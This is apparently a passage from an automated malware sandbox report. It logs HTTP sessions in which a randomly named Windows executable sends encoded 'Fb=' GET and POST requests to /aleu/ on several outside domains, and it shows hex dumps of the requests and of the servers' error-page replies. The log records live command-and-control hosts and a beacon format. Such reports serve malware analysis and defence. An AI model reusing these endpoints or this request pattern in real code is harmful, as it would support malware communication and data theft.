                            Data Raw: 46 62 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 57 38 68 4c 6a 46 48 4a 31 4e 2f 67 45 46 39 62 37 47 55 6f 46 4f 6b 56 69 42 4e 4d 46 33 41 68 75 5a 79 66 72 6c 34 79 66 32 5a 59 52 31 58 79 75 56 78 4e 39 53 69 4d 36 56 57 68 76 4d 46 62 54 6b 43 47 46 2f 2b 61 39 4d 34 6f 4c 64 76 67 7a 72 7a 67 6a 75 2b 77 6c 62 70 43 4c 37 71 4a 6a 4a 71 70 34 49 41 48 41 4b 50 51 53 62 6c 79 51 53 79 50 6b 42 45 51 64 4b 6d 43 79 32 34 57 32 4c 30 35 69 75 71 48 53 54 69 6c 33 7a 58 4d 43 33 44 57 61 74 68 6f 69 50 52 5a 6a 4e 49 4e 48 35 55 59 53 38 57 76 56 35 32 78 6d 39 6a 54 7a 72 77 69 31 4c 4b 66 5a 4a 6f 6e 41 70 4d 75 36 52 30 69 47 34 39 53 6e 63 38 46 6e 55 4a 59 37 45 6e 47 4a 76 71 55 6b 37 61 51 45 77 56 6e 4b 33 4b 48 64 6a 42 6b 67 70 66 52 72 56 6b 58 55 76 33 55 73 5a 59 39 46 43 55 72 30 2f 64 35 65 4e 4d 76 76 50 78 6a 67 37 66 75 78 2f 75 57 44 6a 77 56 69 4d 7a 42 46 6f 57 66 62 4b 76 66 46 4b 6f 6c 33 [TRUNCATED]
                            Data Ascii: Fb=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpW8hLjFHJ1N/gEF9b7GUoFOkViBNMF3AhuZyfrl4yf2ZYR1XyuVxN9SiM6VWhvMFbTkCGF/+a9M4oLdvgzrzgju+wlbpCL7qJjJqp4IAHAKPQSblyQSyPkBEQdKmCy24W2L05iuqHSTil3zXMC3DWathoiPRZjNINH5UYS8WvV52xm9jTzrwi1LKfZJonApMu6R0iG49Snc8FnUJY7EnGJvqUk7aQEwVnK3KHdjBkgpfRrVkXUv3UsZY9FCUr0/d5eNMvvPxjg7fux/uWDjwViMzBFoWfbKvfFKol3JZhdPt9M9Y265xcTQectwzIKgHmzvhmOZD29KmqxPPZvwlXPchk994I7PLOsVZuwvNU16E4BmzogqSANaobgcUQRroou/+rq/z+0YYV/B1vnuPeJxuauc0d/PWBBTPfAqrnSQlJot77ZbhaNvg3Gw9zKtrl6L115K3mrOCsqMJGCIENTfFvsoW4i/0La8xxs4HuXNd1uPm9TeO7gffNl0qg153L+DAPm6RbPCostO3r5TGL38PboHATxyCb3CbZjZjx8r8uNOMA2Xh1GlUn5PvWLorAHDP/xWwNG3VXLaHpcy1Vm2yl2Rj1Oa9Qf+oWHltTDKkh8k1NqcyxReKEtnxcYjIXh1RLyXZQ0A/fhVaIgwljJBEDyf9eEsOfdtwxxG6L/dDCJdYArlxoDKSrNQRbjENam8T9xVzQWMRNzNpQstq3RwaP6U1MwcBTyNS7JITHox9cEK2JyI4Dm1+Xd9fH5biMDwwFC2Yz9ZEdYe0LaAR56Z95zmpbiI2SbuF2txPootTMayvf0ziAuPmifOBjkGJQtO2iosTG7ZezDEMFmsfw7o1VSej4aP/DOyx01gVL6dyIJ6DmJMwkg9Trf04K4HrA1JzbTZY0D3rCJCtEB7m37GHB9lm55fcrPAfvt7KBwP2PoqCKCcmjvCXpYGqsbNndXGFX37x [TRUNCATED]
                            May 14, 2024 12:53:02.249984026 CEST1289INHTTP/1.1 404 Not Found
                            Server: nginx/1.20.1
                            Date: Tue, 14 May 2024 10:53:02 GMT
                            Content-Type: text/html
                            Content-Length: 3650
                            Connection: close
                            ETag: "636d2d22-e42"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                            May 14, 2024 12:53:02.249999046 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                            Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                            May 14, 2024 12:53:02.250014067 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                            Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.1049743162.240.81.18803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:04.780849934 CEST467OUTGET /aleu/?Fb=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5HrlDAC6es8J/4MGCSxvHU4H+D2Na9g==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.aprovapapafox.com
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:53:04.968566895 CEST1289INHTTP/1.1 404 Not Found
                            Server: nginx/1.20.1
                            Date: Tue, 14 May 2024 10:53:04 GMT
                            Content-Type: text/html
                            Content-Length: 3650
                            Connection: close
                            ETag: "636d2d22-e42"
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                            May 14, 2024 12:53:04.968589067 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                            Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                            May 14, 2024 12:53:04.968607903 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                            Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.1049744103.93.125.69803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:11.593732119 CEST709OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.83634.cn
                            Origin: http://www.83634.cn
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.83634.cn/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 79 6b 33 52 5a 6d 64 4b 65 79 68 36 57 52 52 58 67 45 6a 53 59 77 76 7a 4e 4e 33 51 6c 50 68 37 6c 70 64 2f 33 39 38 31 79 71 7a 76 4e 76 44 32 49 6b 33 70 34 5a 79 41 42 6c 61 68 30 6d 49 6a 30 39 74 56 30 52 44 70 70 67 36 6d 7a 48 61 6a 34 42 33 79 34 70 6c 4f 75 2b 31 4d 61 49 66 68 66 48 70 67 42 2b 74 48 70 4a 61 33 33 32 6e 46 77 73 58 7a 48 69 75 51 53 70 44 30 41 58 6d 54 72 53 45 59 63 62 4a 72 44 6b 48 62 42 6a 63 35 51 6e 66 62 74 55 33 50 66 67 6a 54 6d 49 30 43 7a 37 66 59 32 4c 71 59 6d 63 62 55 46 52 2b 51 6d 58 2b 75 31 38 79 47 33 4c 4d 4f
                            Data Ascii: Fb=yk3RZmdKeyh6WRRXgEjSYwvzNN3QlPh7lpd/3981yqzvNvD2Ik3p4ZyABlah0mIj09tV0RDppg6mzHaj4B3y4plOu+1MaIfhfHpgB+tHpJa332nFwsXzHiuQSpD0AXmTrSEYcbJrDkHbBjc5QnfbtU3PfgjTmI0Cz7fY2LqYmcbUFR+QmX+u18yG3LMO
                            May 14, 2024 12:53:11.908082008 CEST1289INHTTP/1.1 530
                            Date: Tue, 14 May 2024 10:53:11 GMT
                            Content-Type: text/html;charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: 8080
                            Data Raw: 31 30 33 61 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f [TRUNCATED]
                            Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
                            May 14, 2024 12:53:11.908174992 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                            Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                            May 14, 2024 12:53:11.908356905 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                            Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                            May 14, 2024 12:53:11.908374071 CEST454INData Raw: 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f e5 90 8d ef
                            Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.1049745103.93.125.69803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:14.440071106 CEST733OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.83634.cn
                            Origin: http://www.83634.cn
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.83634.cn/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 79 6b 33 52 5a 6d 64 4b 65 79 68 36 45 41 42 58 73 48 4c 53 51 77 76 77 42 74 33 51 76 76 68 2f 6c 70 52 2f 33 2b 78 79 79 66 72 76 55 4b 2f 32 50 6d 50 70 2f 5a 79 41 4b 46 62 72 77 6d 4a 74 30 39 68 64 30 51 50 70 70 6b 61 6d 7a 47 4b 6a 35 79 66 74 34 35 6c 49 6e 65 31 4f 65 49 66 68 66 48 70 67 42 2f 63 73 70 4a 79 33 33 6d 37 46 69 5a 36 6c 45 69 75 58 46 5a 44 30 52 48 6d 74 72 53 46 50 63 61 56 42 44 6d 2f 62 42 69 73 35 51 30 48 59 6a 6b 32 45 43 77 69 59 70 74 52 58 2b 37 4c 57 36 36 43 78 35 38 48 4c 43 77 66 58 33 47 66 35 6d 4c 75 49 35 4e 35 6b 63 76 77 39 4b 43 70 4a 4f 65 7a 4b 67 51 4a 6c 75 70 69 35 6e 51 3d 3d
                            Data Ascii: Fb=yk3RZmdKeyh6EABXsHLSQwvwBt3Qvvh/lpR/3+xyyfrvUK/2PmPp/ZyAKFbrwmJt09hd0QPppkamzGKj5yft45lIne1OeIfhfHpgB/cspJy33m7FiZ6lEiuXFZD0RHmtrSFPcaVBDm/bBis5Q0HYjk2ECwiYptRX+7LW66Cx58HLCwfX3Gf5mLuI5N5kcvw9KCpJOezKgQJlupi5nQ==
                            May 14, 2024 12:53:14.754539013 CEST1289INHTTP/1.1 530
                            Date: Tue, 14 May 2024 10:53:14 GMT
                            Content-Type: text/html;charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: 8080
                            Data Raw: 31 30 33 61 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f [TRUNCATED]
                            Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
                            May 14, 2024 12:53:14.754587889 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                            Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                            May 14, 2024 12:53:14.754740000 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                            Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                            May 14, 2024 12:53:14.754760981 CEST454INData Raw: 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f e5 90 8d ef
                            Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.1049746103.93.125.69803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:17.280714035 CEST1746OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.83634.cn
                            Origin: http://www.83634.cn
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.83634.cn/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 79 6b 33 52 5a 6d 64 4b 65 79 68 36 45 41 42 58 73 48 4c 53 51 77 76 77 42 74 33 51 76 76 68 2f 6c 70 52 2f 33 2b 78 79 79 66 6a 76 55 63 72 32 4a 42 62 70 2b 5a 79 41 48 6c 62 6d 77 6d 4a 67 30 2b 52 5a 30 51 7a 54 70 69 57 6d 79 68 4b 6a 2b 44 66 74 72 5a 6c 49 6c 65 31 4e 61 49 66 4f 66 48 35 6b 42 2f 73 73 70 4a 79 33 33 6e 4c 46 68 4d 57 6c 43 69 75 51 53 70 44 77 41 58 6e 41 72 53 64 66 63 62 68 37 44 53 44 62 42 42 45 35 58 48 6a 59 6c 30 32 47 42 77 69 4c 70 74 55 48 2b 37 57 36 36 36 47 58 35 2b 58 4c 42 52 33 4b 79 53 50 43 78 71 76 64 6e 73 70 52 53 61 77 6c 48 52 59 79 4e 73 76 65 33 53 70 7a 6a 59 65 33 77 43 46 79 4b 63 66 4d 56 73 49 74 41 4c 66 76 62 4a 47 45 6f 75 37 77 76 31 6b 52 6e 52 31 32 69 66 79 51 55 31 54 45 57 34 78 74 67 41 4e 38 63 70 73 4f 38 6e 33 58 66 35 4b 71 45 33 53 59 51 61 71 58 75 4b 45 4f 67 6e 65 4e 6a 66 51 2b 4c 36 30 51 31 36 71 4c 75 50 6b 39 5a 31 5a 2b 66 6a 5a 6a 44 43 35 39 4a 53 67 6a 2b 73 6b 73 73 77 6b 69 4c 4a 72 31 75 46 56 54 41 59 34 [TRUNCATED]
